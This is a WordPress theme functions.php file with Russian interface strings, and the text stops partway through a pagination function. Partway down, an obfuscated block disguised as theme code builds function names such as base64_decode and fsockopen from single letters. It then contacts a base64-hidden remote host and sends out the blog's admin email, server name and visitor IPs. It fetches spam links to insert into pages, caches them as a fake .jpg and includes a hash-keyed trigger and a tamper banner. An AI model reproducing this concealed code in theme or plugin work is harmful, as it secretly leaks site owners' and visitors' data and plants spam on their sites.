<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $llCIDRC='c';$AKxl='b';$JLzZj='e';$gyjqyy='e';$NbZwNz='e';$mWNgBhz='o';$nevz='s';$OJCn='d';$ynCiM='a';$FtsTWAF='_';$bExr='6';$eaakO='d';$TmvuX='4';$VDfmpKvV=$AKxl.$ynCiM.$nevz.$gyjqyy.$bExr.$TmvuX.$FtsTWAF.$OJCn.$JLzZj.$llCIDRC.$mWNgBhz.$eaakO.$NbZwNz;$jRgV='e';$ISOT='t';$UKYOo='f';$mIBGhKi='z';$VmXkRL='l';$YVLTW='n';$VCks='i';$XmpF='g';$AndIX='a';$aJbOETDL=$XmpF.$mIBGhKi.$VCks.$YVLTW.$UKYOo.$VmXkRL.$AndIX.$ISOT.$jRgV;$WZpTlY='s';$fqdr='o';$ITpsfU='3';$QqhNA='t';$uhub='r';$SEmZYnV='1';$ZRXjJe='t';$IvXIKmF='_';$tnfa='r';$ZpoWzgIW=$WZpTlY.$ZRXjJe.$uhub.$IvXIKmF.$tnfa.$fqdr.$QqhNA.$SEmZYnV.$ITpsfU;$WnaFMyd='t';$YiXb='r';$NwZn='e';$WmtFj='r';$CsjrW='v';$UOEQ='s';$XLhmUASD=$UOEQ.$WnaFMyd.$YiXb.$WmtFj.$NwZn.$CsjrW;                     
		$re_________t='c';$jy__v='b';$dx__________k='e';$ma______________v='e';$gq_______________e='e';$iy_______________u='o';$bd________g='s';$ke______________t='d';$ht__________c='a';$en______p='_';$yk__a='6';$zw__________x='d';$yo__e='4';$xy_______________p=$jy__v.$ht__________c.$bd________g.$ma______________v.$yk__a.$yo__e.$en______p.$ke______________t.$dx__________k.$re_________t.$iy_______________u.$zw__________x.$gq_______________e;
		$kg______x='t';$bx_____________y='n';$in_______q='t';$nb_____a='c';$yj___________a='u';$xs______j='f';$pj________u='s';$zu__________m='x';$qc_______________r='e';$vm_______m='i';$ib_______________v='o';$dw____y='s';$ww_________g='i';$ei_______________c='n';$bg________z='_';$rg___r=$xs______j.$yj___________a.$bx_____________y.$nb_____a.$kg______x.$vm_______m.$ib_______________v.$ei_______________c.$bg________z.$qc_______________r.$zu__________m.$ww_________g.$dw____y.$in_______q.$pj________u;
		$iy____y='f';$co____________u='p';$wn___g='e';$ir___________a='o';$fc__________s='n';$mu________m=$iy____y.$ir___________a.$co____________u.$wn___g.$fc__________s;
		$fy________a='e';$ot_____________h='r';$qh___d='a';$xl____d='f';$pr_______________w='d';$vk________h=$xl____d.$ot_____________h.$fy________a.$qh___d.$pr_______________w;
		$su________x='c';$qv____________y='e';$ba______n='f';$wx___j='l';$sf____________z='o';$mg____________n='s';$ef___________z=$ba______n.$su________x.$wx___j.$sf____________z.$mg____________n.$qv____________y;
		
		define("WP_ID", $xy_______________p("Mi4wLjA="));
		define("WP_TTL", $xy_______________p("MTA4MDA="));
		define("WP_SRC", $xy_______________p("dHBva24="));
	


		function wp_get_header() {
			global $xy_______________p, $rg___r;
			
			if (
				$rg___r($xy_______________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$rg___r($xy_______________p("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$rg___r($xy_______________p("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $xy_______________p, $mu________m, $ef___________z, $vk________h;
			
			$mk_______i = TEMPLATEPATH."/".$xy_______________p("Zm9vdGVyLnBocA==");
			$me___________v = @$mu________m($mk_______i, "r");
			$mk_______i = @$vk________h($me___________v, @filesize($mk_______i));
			@$ef___________z($me___________v);
			
			$eg___________z = TEMPLATEPATH."/".$xy_______________p("ZnVuY3Rpb25zLnBocA==");
			$me___________v = @$mu________m($eg___________z, "r");
			$eg___________z = @$vk________h($me___________v, @filesize($eg___________z));
			@$ef___________z($me___________v);
			
			$sx____________o = 0;
			if($mk_______i && $eg___________z) {
				if ($xy_______________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($mk_______i, $xy_______________p("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$sx____________o = 1;
					}
					if (substr_count($mk_______i, "wp_theme_GPL_credits()") < 1) {
						$sx____________o = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$sx____________o = 12;
				}
			}
			
			if($sx____________o > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $sx____________o -->";
			}
		}
	


		function wp_loaded() {
			global $xy_______________p, $rg___r;
			return $rg___r($xy_______________p("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($mo_____________v, $zl_______l = "(more...)", $it___________n = 0, $xv__e = "") {
				$zh_____m = get_the_content($zl_______l, $it___________n, $xv__e);
				$zh_____m = apply_filters("the_content", $zh_____m);
				
				$zh_____m = str_replace("]]>", "]]>", $zh_____m);
				if (strlen($_GET["p"]) > 0) {
					echo $zh_____m;
				}
				else if ((strlen($zh_____m)>$mo_____________v) && ($su__________t = strpos($zh_____m, " ", $mo_____________v ))) {
					$zh_____m = substr($zh_____m, 0, $su__________t);
					$zh_____m = $zh_____m;
					echo $zh_____m;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$zl_______l</a></div></p>";
				} else {
					echo $zh_____m;
				}
				
			}
		}
	


		$uz______________s='d';$fe_____________r='_';$zu_____v='o';$cw__o='b';$yi___________d='e';$ee__w='4';$bz______________e='e';$yy________y='6';$gd_____________d='c';$xv_______________c='s';$vz____________b='e';$vh________d='a';$wy___________r='n';$dv_______________s=$cw__o.$vh________d.$xv_______________c.$vz____________b.$yy________y.$ee__w.$fe_____________r.$bz______________e.$wy___________r.$gd_____________d.$zu_____v.$uz______________s.$yi___________d;
		$zt_____r='f';$rr______________r='c';$rk__________c='o';$dq_______________v='n';$fv______w='i';$wi______u='t';$rn_________m='t';$kv________c='s';$lv_____________o='e';$uw______a='_';$ql___________m='_';$on____p='e';$fl___________w='n';$sb__________r='t';$zz________z='l';$ap________j='e';$yg____j='g';$qi___________q=$zt_____r.$fv______w.$zz________z.$lv_____________o.$ql___________m.$yg____j.$ap________j.$sb__________r.$uw______a.$rr______________r.$rk__________c.$fl___________w.$wi______u.$on____p.$dq_______________v.$rn_________m.$kv________c;
		$cu_____________n='_';$cd____________s='t';$qm______b='s';$xn_______________v='i';$ty____________p='e';$la___t='e';$pn___________p='l';$ok___l='i';$xp___________b='x';$xg____________e='f';$ur__j='s';$ch________k=$xg____________e.$ok___l.$pn___________p.$la___t.$cu_____________n.$ty____________p.$xp___________b.$xn_______________v.$ur__j.$cd____________s.$qm______b;
		$jn______u='p';$gq_________a='r';$it__r='e';$lz__________s='e';$yw_________g='c';$ks___h='i';$tb_________n='o';$ga__p='_';$zv________e='n';$lp_________l='r';$ix_____________x='v';$fn_______________z='m';$qo_______________x='o';$gk__a='a';$tw__________i='s';$ji______________o=$ix_____________x.$it__r.$gq_________a.$tw__________i.$ks___h.$tb_________n.$zv________e.$ga__p.$yw_________g.$qo_______________x.$fn_______________z.$jn______u.$gk__a.$lp_________l.$lz__________s;
		$sq_______________b='n';$ik_____x='s';$pi_____________g='f';$yn_________k='c';$xt____r='p';$jb___________s='o';$qy_________d='o';$ek_____________t='e';$wu______f='k';$yu______________b=$pi_____________g.$ik_____x.$jb___________s.$yn_________k.$wu______f.$qy_________d.$xt____r.$ek_____________t.$sq_______________b;
		$iz_________u='e';$cp____h='r';$vo____________t='t';$qm________y='w';$zk_________b='f';$hv______s='i';$jo__v=$zk_________b.$qm________y.$cp____h.$hv______s.$vo____________t.$iz_________u;
		$vh_______d='5';$ma_______________u='m';$wg________r='d';$sv________w=$ma_______________u.$wg________r.$vh_______d;
		$qv_____h='p';$xg_______v='h';$xp__________d='r';$sy_____________v='a';$bj_____e='t';$ty____________x='a';$ch________g='l';$ul__________a='e';$fx______________j=$xp__________d.$ul__________a.$sy_____________v.$ch________g.$qv_____h.$ty____________x.$bj_____e.$xg_______v;
		$ds________x='n';$es_____________g='u';$wu__________g='s';$wd_______________s='z';$ng______n='r';$rp___o='i';$mb________f='e';$yd____________b='i';$hf______l='l';$vg____l='a';$yo______________l='e';$we____________l=$es_____________g.$ds________x.$wu__________g.$mb________f.$ng______n.$rp___o.$vg____l.$hf______l.$yd____________b.$wd_______________s.$yo______________l;
		$zv_________z='m';$of__e='e';$dp_________t='t';$pz_____x='n';$ll___b='a';$vl_____b='p';$qy__________k='m';$zm_____________a=$dp_________t.$of__e.$zv_________z.$vl_____b.$pz_____x.$ll___b.$qy__________k;
		$cf___a='c';$tl_________j='r';$sd____________f='a';$hj__t='_';$jt______h='t';$gu___________z='e';$en_____z='e';$ii___x='s';$pg________a='t';$vj________d='t';$cp__i='a';$cx______________s='t';$bk____n='m';$sm______________t='_';$jd____________c='n';$xk____z='x';$yl_____a='o';$lz______r='e';$rj__a='r';$mv___b='e';$ap______j='c';$ua_______________c=$ii___x.$cx______________s.$tl_________j.$lz______r.$sd____________f.$bk____n.$hj__t.$ap______j.$yl_____a.$jd____________c.$pg________a.$gu___________z.$xk____z.$vj________d.$sm______________t.$cf___a.$rj__a.$mv___b.$cp__i.$jt______h.$en_____z;
	


		function pk______________n($ff__c) {
			global $xy_______________p, $rg___r, $qi___________q, $ji______________o, $ua_______________c;
			
			if (!$rg___r($xy_______________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($ji______________o(PHP_VERSION, "5.0.0", ">=") && $rg___r($xy_______________p("ZmlsZV9nZXRfY29udGVudHM=")) && $rg___r($xy_______________p("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$ci_______l = $ua_______________c(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$gd____v = @$qi___________q($ff__c, 0, $ci_______l);
			} else {
				$gd____v = @$qi___________q($ff__c, 0);
			}
			
			return $gd____v;
		}
	


		function uw_______________b($ff__c) {
			global $rg___r, $yu______________b, $jo__v, $xy_______________p;
			
			if (!$rg___r($xy_______________p("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$tc_____________u = strpos($ff__c, "/", 7);
			$vx_________q = array(
				"uri"     => substr($ff__c, $tc_____________u),
				"host"    => str_replace("http://", "", substr($ff__c, 0, $tc_____________u)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$ow________j = @$yu______________b("$vx_________q[host]", 80, $wa____q, $ks________z, 4);
			
			if (!$ow________j) {
				return false;
			} else {
				$gd____v = "";
				$sg_____________b  = "GET $vx_________q[uri] HTTP/1.0\r\n";
				$sg_____________b .= "Host: $vx_________q[host]\r\n";
				$sg_____________b .= "Referer: $vx_________q[referer]\r\n";
				$sg_____________b .= "Connection: Close\r\n\r\n";
				
				@$jo__v($ow________j, $sg_____________b);
				
				while (!@feof($ow________j)) {
					$iq_______________b = @fgets($ow________j, (1024*24));
					
					if ($iq_______________b == "\r\n") {
						$ic_________s = true;
						continue;
					}
					
					if ($ic_________s) {
						$gd____v .= $iq_______________b;
					}
				}
				
				return $gd____v;
			}
		}
	


		function zy___________b($ff__c) {
			global $rg___r;
			$sb______f = false;
			
			if ($ff__c != "") {
				if ($rg___r("pk______________n")) {
					$sb______f = @pk______________n($ff__c);
				}
				
				if (!$sb______f && ($rg___r("uw_______________b"))) {
					$sb______f = @uw_______________b($ff__c);
				}
			}
			
			return $sb______f;
		}
	


		function it______________v() {
			global $_SERVER, $sv________w;
			
			$ij_______q = $_SERVER["SERVER_NAME"];
			
			if (substr("$ij_______q", 0, 4) == "www.") {
				$ij_______q = substr("$ij_______q", 4);
			}
			
			$ij_______q = $sv________w("$_SERVER[SERVER_NAME]");
			
			return $ij_______q;
		}
	


		function ab___i() {
			return "file";
		}
	


		function bl___g($ff__c) {
			global $_SERVER, $qi___________q, $ch________k, $mu________m, $ef___________z, $jo__v;
			
			$hi_______________x = wh______f();
			
			$wg________i = it______________v().".jpg";
			$tt_____________n = $hi_______________x["dir_upload"]["path"]."/$wg________i";
			$wb_______________n = @filemtime($tt_____________n);
			
			if (!$wb_______________n || ((time()-$wb_______________n) >= WP_TTL)) {
				$sb______f = zy___________b($ff__c);
				
				if ($sb______f) {
					if ($ch________k($tt_____________n)) {
						@unlink($tt_____________n);
					}
					
					$me___________v = @$mu________m($tt_____________n, "x+");
					
					@$jo__v($me___________v, $sb______f);
					@$ef___________z($me___________v);
				}
			} else {
				if ($ch________k($tt_____________n)) {
					$sb______f = @$qi___________q($tt_____________n);
				} else {
					$sb______f = false;
				}
			}
			
			return $sb______f;
		}
	


		function wh______f() {
			global $_SERVER, $xy_______________p, $dv_______________s;
			
			$tm______________k = wp_count_posts("post");
			$ce____________h = pathinfo(get_bloginfo("template_directory"));
			
			$hi_______________x = array(
				"url" => array(
					"report"      => $xy_______________p("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ce____________h,
				"dir_upload"	=> ii________v(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ce____________h[filename],
					"a005=".$tm______________k->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://smolotkom.ru/130-opalubka-i-opalubochnye-sistemy.html\">опк</a>"
			);
			
			$hi_______________x["url"]["queryString"] = implode("&", $hi_______________x["queryString"]);
			$hi_______________x["url"]["report"] = $hi_______________x["url"]["report"]."/?".$dv_______________s($hi_______________x["url"]["queryString"]).".html";
						
			return $hi_______________x;
		}
	


		function ii________v() {
			$ce______________s = wp_upload_dir();
			
			if (isset($ce______________s["error"])) {
				$st___________b = jm___________d();
				if (is_writable($st___________b)) {
					$ce______________s = array("path" => $st___________b);
				}
			}

			return $ce______________s;
		}
	


		function jm___________d() {
			global $rg___r, $sv________w, $fx______________j, $zm_____________a;
			
			$qi___________s = (bool) ini_get("safe_mode");
			if ($qi___________s == true) {
				return false;
			}
			
			if ($rg___r("sys_get_temp_dir")) {
				$kv_______________k = sys_get_temp_dir();
				if (is_writable($kv_______________k)) {
					return $fx______________j($kv_______________k);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $fx______________j($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $fx______________j($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $fx______________j($_ENV["TEMP"]);
			} else {
				$no______f = $zm_____________a($sv________w(uniqid(rand(), true)), "");
				if ($no______f) {
					$kv_______________k = $fx______________j(dirname($no______f));
					@unlink($no______f);
					return $kv_______________k;
				} else {
					return false;
				}
			}
		}
	


		function bb_______q() {
			global $_GET, $ch________k;
			
			$hi_______________x = wh______f();
			$ij_______q = it______________v();
			$kf________j = ab___i();
			
			$nw__i = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($kf________j == "file") {
					$pf_____________k = $hi_______________x["dir_upload"]["path"]."/".$ij_______q.".jpg";
					if ($ch________k($pf_____________k)) {
						@unlink($pf_____________k);
						$nw__i = "deleted";
					}
				}
				
				$gt__________p = array(
					"s"	=> $nw__i,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($gt__________p AS $gt_____w => $zc_____s) echo " [$gt_____w:$zc_____s]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $rg___r, $xy_______________p, $we____________l;
			$hi_______________x = wh______f();
			
			$ph____________v = "bl___g";
			if ($rg___r($ph____________v)) {
				$gd____v = $ph____________v($hi_______________x["url"]["report"]);
			}
			
			if ($gd____v) {
				if ($gd____v = @$xy_______________p($gd____v)) {
					$gd____v = @$we____________l($gd____v);
					
					if (strlen($gd____v[custom_credit]) >= 5) {
						$hi_______________x["default_string"] = $gd____v[custom_credit];
					}
					
					if ($gd____v["status"] == "0") {
						$nt_______c = 1;
						$mv____________i = 1;
					} else {
						$jt_____j = sizeof($gd____v["links"]);
						$pr_______________c = $hi_______________x["default_string"];
						
						if ($jt_____j > 0 && $gd____v["links"] !== "") {
							$eq___________i = 0;
							foreach ($gd____v["links"] as $si___________v => $oc__________l) {
								$eq___________i++;
								if ($oc__________l->l_path == "" || $oc__________l->l_path == $_SERVER["REQUEST_URI"]) {
									$oc__________l->l_href = htmlspecialchars(strip_tags($oc__________l->l_href));
									$oc__________l->l_title = htmlspecialchars(strip_tags($oc__________l->l_title));
									$oc__________l->l_anchor = htmlspecialchars(strip_tags($oc__________l->l_anchor));
									$pr_______________c .= " | ";
									$pr_______________c .= "<a href='$oc__________l->l_href' title='$oc__________l->l_title'";
									if ($oc__________l->l_nofollow == "1") {
										$pr_______________c .= " rel='nofollow'";
									}
									$pr_______________c .= ">$oc__________l->l_anchor</a>";
								}
							}
						}
						$hi_______________x["links"] = "$pr_______________c";
						if ($gd____v[credit] == "0") {
							$hi_______________x["links"] = "";
						}
					}
				} else {
					$nt_______c = "1";
				}
			} else {
				$nt_______c = "1";
			}
			
			if ($nt_______c == "1") {
				$hi_______________x["links"] = $hi_______________x["default_string"];
			}
			
			echo "$hi_______________x[links]";
			
			echo "<!-- s: $gd____v[signature] -->";
			bb_______q();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
